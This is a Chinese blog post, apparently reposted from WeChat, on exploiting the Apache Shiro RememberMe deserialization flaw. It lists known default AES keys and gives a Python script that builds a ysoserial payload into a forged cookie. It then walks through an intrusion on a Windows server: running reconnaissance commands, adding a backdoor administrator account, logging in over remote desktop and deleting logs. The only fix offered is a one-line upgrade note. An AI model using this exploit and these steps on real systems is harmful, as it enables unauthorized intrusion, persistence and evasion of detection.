Apache Shiro反序列化漏洞利用

最新推荐文章于 2025-06-12 11:27:32 发布
最新推荐文章于 2025-06-12 11:27:32 发布
阅读量1.9k 收藏 8
点赞数
CC 4.0 BY-SA版权
文章标签: 渗透测试
原文链接:https://mp.weixin.qq.com/s/6tUPrLGL0qCL01hlCJyWoA
本文详细介绍了Apache Shiro框架中的反序列化漏洞原理及利用过程,并提供了具体的攻击示例,最后给出了修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Apache Shiro反序列化漏洞利用

原文链接:https://mp.weixin.qq.com/s/6tUPrLGL0qCL01hlCJyWoA

◐关于Shiro

Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理.

Shiro提供了RememberMe的功能,当用户关闭浏览器,下次再打开浏览器访问时,还是能记住我是谁,无需登录即可访问。其实很多网站都有这功能,Shiro对RememberMe的Cookie做了加密处理,在CookieRememberMeManaer类中将Cookie中RememberMe字段内容分别进行序列化、AES加密、Base64编码等操作,但是默认的加密AES Key是硬编码进去的,都知道这个Key是什么,所以在逆向操作反序列化、Base64解密的时候,攻击者就可以伪造恶意数据通过反序列化远程执行命令。

◐关于Key

常见的Key:

kPH+bIxk5D2deZiIxcaaaA==(1.2.4默认key)
2AvVhdsgUs0FSA3SDFAdag==
4AvVhmFLUs0KTA3Kprsdag==
3AvVhmFLUs0KTA3Kprsdag==
wGiHplamyXlVB11UXWol8g==
Z3VucwAAAAAAAAAAAAAAAA==
6ZmI6I2j5Y+R5aSn5ZOlAA==
ZUdsaGJuSmxibVI2ZHc9PQ==
fCq+/xW488hMTCD+cmJ3aQ==
1QWLxg+NYmxraMoxAXu/Iw==
wGiHplamyXlVB11UXWol8g==
Z3VucwAAAAAAAAAAAAAAAA==
6ZmI6I2j5Y+R5aSn5ZOlAA==
ZUdsaGJuSmxibVI2ZHc9PQ==
1QWLxg+NYmxraMoxAXu/Iw==
......

利用Key生成rememberMe参数值python代码:


import sys
 import uuid
 import base64
 import subprocess
 from Crypto.Cipher import AES
 
 def encode_rememberme(command):  #ysoserial-0.0.6-SNAPSHOT-all.jar #文件需要在该文件目录

     popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
     BS = AES.block_size
     pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
     key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
     iv = uuid.uuid4().bytes
     encryptor = AES.new(key, AES.MODE_CBC, iv)
     file_body = pad(popen.stdout.read())
     base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
     return base64_ciphertext
 
 
 if __name__ == '__main__':
     payload = encode_rememberme(sys.argv[1])
 print "rememberMe={0}".format(payload.decode())

在这里插入图片描述

■ 实例

1.判断是否使用了Apache Shiro,登录抓包通过返回可看到 rememberMe=deleteMe信息,确定使用Apache Shiro。其他判断方式可以在登录页面时,提交表单后看set-cookie是否存在remeberMe=deleteMe。
在这里插入图片描述

2.使用已知的Key生成rememberMe参数值插入到cookie中进行提交,测试是否存在漏洞。这里使用写好的jar插件,可以在Burpsuite安装扩展插件,可以方便利用存在的Key进行生成shiro payload进行测试是否存在漏洞。
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

3.测试使用key:fCq+/xW488hMTCD+cmJ3aQ==生成payload成功执行命令:whoami,返回administrator,知道服务器当前用户是administrator权限,应该是windows系统。执行命令:systeminfo查看系统信息,系统为Windows Server 2012 R2。在这里插入图片描述
在这里插入图片描述

4.执行ipconfig查看网络配置信息,查看到服务器IP公网开放。执行命令:netstat -an查看端口开放情况,看到3389端口开放,可能开启了远程桌面连接。
在这里插入图片描述
在这里插入图片描述

5:执行命令:tasklist /svc查看svchost.exe进程下termservice服务对应的PID为3076
在这里插入图片描述
6.执行命令netstat -ano查看PID:3076对应的端口为3389,确实开启了远程桌面连接。
在这里插入图片描述

7.执行命令:net user 查看到当前用户。
在这里插入图片描述
8.执行命令:net user admin admin /add新建一个用户,由于编码问题返回结果不清晰,执行命令:net user 查看有没有成功,看到多了一个admin用户。
在这里插入图片描述
在这里插入图片描述

9.执行命令:net localgroup Administrators admin /add将刚刚新建的用户提升为管理员权限。
在这里插入图片描述
10.打开远程桌面连接,连接服务器,使用刚刚新建好的用户进行登录,成功登录到服务器。删除日志退出,删除新建用户。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

■ 修复方案

1、进行版本升级。

安全渣
关注
Apache Shiro系列漏洞利用以及实战总结
jammny
10-14 1万+
前言: Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。内置了可以连接大量安全数据源(又名目录)的Realm,如LDAP、关系数据库(JDBC)、类似INI的文本配置资源以及属性文件等。 目录 RememberMe RCE-550(CVE-2016-4437) 远程安全限制绕过漏洞(CVE-2016-6802) Padding Orac
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
shiro550反序列化漏洞(CVE-2016-4437)漏洞复现
最新发布
m0_74795359的博客
06-12 393
其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化,默认ASE秘钥,Key: kPH+bIxk5D2deZiIxcaaaA==Apache Shiro是一款开源强大且易用的Java安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。访问对应地址,随便输入账号密码,bp抓包重发,可观察到rememberMe=deleteMe字样,基本可以确定网站是Apache Shiro搭建。
Shiro反序列化漏洞-Shiro550流程分析
永远都没有了
05-10 991
Shiro
Apache Shiro-550 反序列化漏洞复现
ZXT02的博客
03-02 1739
Apache Shiro550反序列化(CVE-2016-4437)漏洞分析、复现及修复。
apache shiro 反序列化漏洞解决方案
qq_36407469的博客
07-27 5876
一、反序列化漏洞介绍 序列化:把对象转换为字符串或者字节流的过程。 反序列化:把字符串或者字节流恢复为对象的过程。 反序列化漏洞的产生原理,即黑客通过构造恶意的序列化数据,从而控制应用在反序列化过程中需要调用的类方法,最终实现任意方法调用。如果在这些方法中有命令执行的方法,黑客就可以在服务器上执行任意的命令。 二、产生原因 shiro提供了记住我(RememberMe)的功能,即可以在关闭浏览器的情况下,下次打开时还能记住你是谁,无需登录即可访问。 shiro默认使用了CookieRememberMeMa
人工智能-项目实践-检测-Apache Shiro 反序列化漏洞检测与利用工具.zip
12-23
Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。 该脚本通过网络收集到的22个key利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则...
Apache shiro1.2.4反序列化漏洞介绍.docx
07-01
然而,在Apache Shiro 1.2.4及其更早的版本中,存在一个严重的反序列化漏洞。这个漏洞主要与RememberMe服务的实现有关。在处理RememberMe的Cookie时,Shiro的`CookieRememberMeManager`类会执行一系列操作:首先,它...
Shiro反序列化漏洞检测工具
01-05
Apache Shiro是一款强大的Java安全框架,它为...通过了解Shiro反序列化漏洞的原理和防范措施,我们可以更好地保护我们的系统免受此类攻击。同时,使用提供的检测工具进行定期扫描,也能及时发现并修复潜在的安全隐患。
shiro反序列化漏洞检测工具,含链接教程
08-17
该压缩包文件包含的`shiro_tool.jar`很可能是一个专门用于检测Apache Shiro反序列化漏洞的工具。使用方法如描述所示,通过命令行输入`java -jar shiro_tool.jar`后跟目标服务器的URL,工具会尝试识别并测试该服务器...
Apache Shiro反序列化漏洞复现(Shiro550,CVE-2016-4437)
bhegi_seg的博客
03-31 450
Shiro是什么东西? Shiro 是 Java 的一个安全框架,执行身份验证、授权、密码、会话管理 shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化 然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。 原理解释https://www.freebuf.com/vuls/178014.html 什么是硬编码: 硬编
shiro反序列化生成KEY
qq_35476650的博客
06-29 1219
shiro反序列化生成KEY 简介 Shiro反序列化时候的第一步需要猜KEY,此番操作就像遍历弱口令似的。 生成KEY的代码 #shengcheng.java import org.apache.shiro.codec.Base64; import javax.crypto.KeyGenerator; import javax.crypto.SecretKey; import java.security.NoSuchAlgorithmException; public class poc {
X-ray捡洞中遇到的高频漏洞Shiro默认key、备份文件&敏感目录泄露、Druid未授权访问、phpstudy-nginx解析漏洞、dedecms-cve-2018-6910)
热门推荐
Love&Share
11-10 1万+
用 X-Ray 刷洞发现一些出现频率高的漏洞,把漏洞原理和利用方式稍作整理,按照危害排名,低危漏洞可以收集一些信息然后深度利用变高危 文章目录直接利用Shiro默认keySql注入备份文件&敏感目录泄露Druid未授权访问XSS有条件利用phpstudy-nginx解析漏洞dedecms-cve-2018-6910鸡肋Apache Tomcat Examples未删除go-pprof资源监控信息泄露ELSE配置xray反连360提交漏洞 直接利用 Shiro默认key Xray提示:shiro/s.
记一次Shiro550漏洞复现及利用(CVE-2016-4437)
qq_57419222的博客
07-21 344
Apache Shiro框架在登陆页面提供了记住密码的功能(RememberMe),用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>base64编码=>RememberMe Cookie值。
Shiro RememberMe反序列化漏洞复现(Shiro-550)
box
11-28 5356
0x00 漏洞原理简要分析 官方说明:https://issues.apache.org/jira/browse/SHIRO-550 Shiro提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行 : 序列化 =>AES加密 =>Base64编码操作 在识别身份
反序列化漏洞复现总结
kali_Ma的博客
10-14 6795
前言 最近一直在整理笔记,恰好碰到实习时遇到的Shiro反序列化漏洞,本着温故而知新的思想,就照着前辈们的文章好好研究了下,整理整理笔记并发个文章。 1、Apache Shiro介绍 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 2、Shiro rememberMe反序列化漏洞Shiro-550) 2.1 受影响版本 Apache
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值